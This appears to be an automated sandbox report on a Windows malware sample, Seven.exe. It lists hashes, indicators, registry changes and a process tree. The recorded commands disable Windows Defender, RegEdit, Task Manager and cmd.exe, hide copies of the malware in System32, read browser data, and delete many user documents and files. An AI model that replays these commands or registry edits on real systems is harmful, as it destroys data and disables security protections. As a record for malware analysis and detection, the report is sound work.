Analysis
-
max time kernel
54s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
29/04/2024, 18:31
Static task
static1
Behavioral task
behavioral1
Sample
Seven.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral2
Sample
Seven.exe
Resource
win11-20240426-en
Behavioral task
behavioral3
Sample
Seven.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral4
Sample
Seven.exe
Resource
win11-20240426-en
General
-
Target
Seven.exe
-
Size
139KB
-
MD5
350273e0d2e8a9ba5e37b791016112a0
-
SHA1
5bfb616dd46f67d1dcbbff55ca5917ffc1ec8b71
-
SHA256
27297bf8139bea755e9297e7e1489d827d1ee09a8e1d94a3ef96a2edb2de61ba
-
SHA512
b1e768524b4e840bd5f4163205122dd1725583245d8bfd5cbd89eb21a5fb9d33aff1b7b0ca42132b7dae469e025068ae663b3b02ad59927a558dc340141ec91b
-
SSDEEP
3072:miS4omp03WQthI/9S3BZi08iRQ1G78IVn27bSfcJd8ltw:miS4ompB9S3BZi0a1G78IVhcTct
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Seven.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "1" Seven.exe -
Blocks application from running via registry modification 1 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Seven.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Seven.exe -
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" Seven.exe -
Deletes itself 1 IoCs
pid Process 9012 Winhost.exe -
Executes dropped EXE 59 IoCs
pid Process 9012 Winhost.exe 12764 Winhost.exe 5772 Winhost.exe 10088 Winhost.exe 15796 Winhost.exe 16216 Winhost.exe 16228 Winhost.exe 16064 Winhost.exe 16116 Winhost.exe 11556 Winhost.exe 3500 Winhost.exe 11308 Winhost.exe 12048 Winhost.exe 4984 Winhost.exe 6508 Winhost.exe 16272 Winhost.exe 6824 Winhost.exe 1264 Winhost.exe 7028 Winhost.exe 2064 Winhost.exe 12804 Winhost.exe 11384 Winhost.exe 12472 Process not Found 16428 Process not Found 5320 Process not Found 6792 Process not Found 280 Process not Found 6600 Process not Found 9468 Process not Found 9496 Process not Found 7960 Process not Found 11376 Process not Found 11372 Process not Found 6472 Process not Found 11412 Process not Found 888 Process not Found 8436 Process not Found 3028 Process not Found 6140 Process not Found 2544 Process not Found 12176 Process not Found 560 Process not Found 7120 Process not Found 2736 Process not Found 5580 Process not Found 11596 Process not Found 6808 Process not Found 9940 Process not Found 10480 Process not Found 6688 Process not Found 15496 Process not Found 5680 Process not Found 7324 Process not Found 7412 Process not Found 8696 Process not Found 3376 Process not Found 11432 Process not Found 8996 Process not Found 3636 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" Seven.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1" Seven.exe -
Drops desktop.ini file(s) 7 IoCs
description ioc Process File opened for modification C:\Users\Admin\Pictures\desktop.ini Seven.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini Seven.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini Seven.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Seven.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini Seven.exe File opened for modification C:\Users\Admin\Music\desktop.ini Seven.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Seven.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 raw.githubusercontent.com 2 raw.githubusercontent.com -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\ Seven.exe File created C:\Windows\System32\Winhost.exe cmd.exe File opened for modification C:\Windows\System32\Winhost.exe cmd.exe File opened for modification C:\Windows\System32\Seven.dll cmd.exe File created C:\Windows\System32\Seven.runtimeconfig.json cmd.exe File opened for modification C:\Windows\System32\Winhost.exe attrib.exe File created C:\Windows\System32\Seven.dll cmd.exe File opened for modification C:\Windows\System32\Seven.runtimeconfig.json cmd.exe File opened for modification C:\Windows\System32\Seven.runtimeconfig.json attrib.exe File opened for modification C:\Windows\System32\Seven.dll attrib.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpshuazz.tmp" Seven.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4908 powershell.exe 4908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4908 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2932 wrote to memory of 4908 2932 Seven.exe 79 PID 2932 wrote to memory of 4908 2932 Seven.exe 79 PID 2932 wrote to memory of 2368 2932 Seven.exe 81 PID 2932 wrote to memory of 2368 2932 Seven.exe 81 PID 2932 wrote to memory of 3792 2932 Seven.exe 82 PID 2932 wrote to memory of 3792 2932 Seven.exe 82 PID 2932 wrote to memory of 4252 2932 Seven.exe 83 PID 2932 wrote to memory of 4252 2932 Seven.exe 83 PID 2932 wrote to memory of 2728 2932 Seven.exe 84 PID 2932 wrote to memory of 2728 2932 Seven.exe 84 PID 2932 wrote to memory of 2756 2932 Seven.exe 85 PID 2932 wrote to memory of 2756 2932 Seven.exe 85 PID 2932 wrote to memory of 2528 2932 Seven.exe 86 PID 2932 wrote to memory of 2528 2932 Seven.exe 86 PID 2932 wrote to memory of 832 2932 Seven.exe 87 PID 2932 wrote to memory of 832 2932 Seven.exe 87 PID 2528 wrote to memory of 4400 2528 cmd.exe 88 PID 2528 wrote to memory of 4400 2528 cmd.exe 88 PID 4252 wrote to memory of 4364 4252 cmd.exe 89 PID 4252 wrote to memory of 4364 4252 cmd.exe 89 PID 832 wrote to memory of 3232 832 cmd.exe 90 PID 832 wrote to memory of 3232 832 cmd.exe 90 PID 2932 wrote to memory of 2552 2932 Seven.exe 1363 PID 2932 wrote to memory of 2552 2932 Seven.exe 1363 PID 2932 wrote to memory of 2192 2932 Seven.exe 92 PID 2932 wrote to memory of 2192 2932 Seven.exe 92 PID 2932 wrote to memory of 4860 2932 Seven.exe 93 PID 2932 wrote to memory of 4860 2932 Seven.exe 93 PID 2932 wrote to memory of 3292 2932 Seven.exe 1361 PID 2932 wrote to memory of 3292 2932 Seven.exe 1361 PID 2932 wrote to memory of 2200 2932 Seven.exe 95 PID 2932 wrote to memory of 2200 2932 Seven.exe 95 PID 2932 wrote to memory of 3672 2932 Seven.exe 96 PID 2932 wrote to memory of 3672 2932 Seven.exe 96 PID 2932 wrote to memory of 4392 2932 Seven.exe 97 PID 2932 wrote to memory of 4392 2932 Seven.exe 97 PID 2932 wrote to memory of 3668 2932 Seven.exe 1387 PID 2932 wrote to memory of 3668 2932 Seven.exe 1387 PID 2932 wrote to memory of 4240 2932 Seven.exe 1362 PID 2932 wrote to memory of 4240 2932 Seven.exe 1362 PID 2932 wrote to memory of 1872 2932 Seven.exe 101 PID 2932 wrote to memory of 1872 2932 Seven.exe 101 PID 2932 wrote to memory of 4928 2932 Seven.exe 102 PID 2932 wrote to memory of 4928 2932 Seven.exe 102 PID 2932 wrote to memory of 2032 2932 Seven.exe 103 PID 2932 wrote to memory of 2032 2932 Seven.exe 103 PID 2932 wrote to memory of 4076 2932 Seven.exe 104 PID 2932 wrote to memory of 4076 2932 Seven.exe 104 PID 2932 wrote to memory of 2748 2932 Seven.exe 107 PID 2932 wrote to memory of 2748 2932 Seven.exe 107 PID 2932 wrote to memory of 2016 2932 Seven.exe 110 PID 2932 wrote to memory of 2016 2932 Seven.exe 110 PID 2932 wrote to memory of 4500 2932 Seven.exe 111 PID 2932 wrote to memory of 4500 2932 Seven.exe 111 PID 2932 wrote to memory of 3316 2932 Seven.exe 124 PID 2932 wrote to memory of 3316 2932 Seven.exe 124 PID 2932 wrote to memory of 4008 2932 Seven.exe 125 PID 2932 wrote to memory of 4008 2932 Seven.exe 125 PID 2932 wrote to memory of 2036 2932 Seven.exe 126 PID 2932 wrote to memory of 2036 2932 Seven.exe 126 PID 2932 wrote to memory of 2168 2932 Seven.exe 127 PID 2932 wrote to memory of 2168 2932 Seven.exe 127 PID 2932 wrote to memory of 2736 2932 Seven.exe 128 PID 2932 wrote to memory of 2736 2932 Seven.exe 128 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Seven.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "1" Seven.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4400 attrib.exe 3232 attrib.exe 4364 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Seven.exe"C:\Users\Admin\AppData\Local\Temp\Seven.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
- Windows security modification
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Users\Admin\AppData\Local\Temp\Winhost.exe2⤵PID:2368
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.exe C:\Windows\System32\Winhost.exe2⤵
- Drops file in System32 directory
PID:3792
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\Winhost.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\Winhost.exe3⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:4364
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.dll C:\Windows\System32\Seven.dll2⤵
- Drops file in System32 directory
PID:2728
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C copy C:\Users\Admin\AppData\Local\Temp\Seven.runtimeconfig.json C:\Windows\System32\Seven.runtimeconfig.json2⤵
- Drops file in System32 directory
PID:2756
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\Seven.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\Seven.dll3⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:4400
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C attrib +h C:\Windows\System32\Seven.runtimeconfig.json2⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\attrib.exeattrib +h C:\Windows\System32\Seven.runtimeconfig.json3⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:3232
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt"2⤵PID:2552
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9316
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log.html"2⤵PID:2192
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log-MSI_vc_red.msi.txt"2⤵PID:4860
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:7612
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log.html"2⤵PID:3292
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9348
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log"2⤵PID:2200
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9340
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log"2⤵PID:3672
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:12124
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log"2⤵PID:4392
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9332
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log"2⤵PID:3668
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9324
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log"2⤵PID:4240
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9264
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log"2⤵PID:1872
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:12132
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log"2⤵PID:4928
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9308
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_001_vcRuntimeAdditional_x86.log"2⤵PID:2032
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:12140
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log"2⤵PID:4076
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9272
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log"2⤵PID:2748
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:12148
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_000_vcRuntimeMinimum_x86.log"2⤵PID:2016
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9356
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_001_vcRuntimeAdditional_x86.log"2⤵PID:4500
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:9256
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\CompareAssert.pptx"2⤵PID:3316
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13436
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\FindGroup.doc"2⤵PID:4008
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13396
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\Microsoft Edge.lnk"2⤵PID:2036
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2096
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Are.docx"2⤵PID:2168
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13444
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Files.docx"2⤵PID:2736
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13568
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\FindReceive.xlsx"2⤵PID:4856
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13388
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\MeasureWait.doc"2⤵PID:1272
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Opened.docx"2⤵PID:4044
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13484
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\OutSearch.docx"2⤵PID:4652
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13420
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\PingOptimize.xls"2⤵PID:756
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Recently.docx"2⤵PID:5100
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13468
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\RequestAdd.pptx"2⤵PID:4784
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13316
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\TestMove.html"2⤵PID:3892
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13176
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\These.docx"2⤵PID:1948
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13156
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\ClearRequest.docx"2⤵PID:748
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13232
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\LockSwitch.ppt"2⤵PID:336
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13412
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\RenameApprove.png"2⤵PID:3708
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\ResizeStep.html"2⤵PID:764
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13080
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"2⤵PID:1764
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13192
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"2⤵PID:1840
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13452
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\BlockExport.pptx"2⤵PID:1368
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13460
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\LimitHide.xml"2⤵PID:1496
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13248
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\SkipStep.pdf"2⤵PID:1516
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13168
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\ExitLimit.png"2⤵PID:4548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13308
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\My Wallpaper.jpg"2⤵PID:2700
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13928
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\PopCopy.png"2⤵PID:5036
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13876
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\UnpublishEnter.png"2⤵PID:2864
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13428
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\MountGet.jpg"2⤵PID:2576
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13508
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714145728.txt"2⤵PID:2144
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13952
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"2⤵PID:3236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15032
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI48DA.txt"2⤵PID:3556
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14276
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI48F4.txt"2⤵PID:1940
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13560
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI48DA.txt"2⤵PID:3232
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13072
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI48F4.txt"2⤵PID:3196
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14120
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"2⤵PID:2452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14900
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240426_153151384.html"2⤵PID:2880
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:11272
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"2⤵PID:4948
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13276
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"2⤵PID:2752
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13184
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"2⤵PID:1180
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13268
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"2⤵PID:3392
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13980
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"2⤵PID:2544
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14260
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml"2⤵PID:3964
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13240
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"2⤵PID:2620
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13216
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"2⤵PID:2728
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15492
-
-
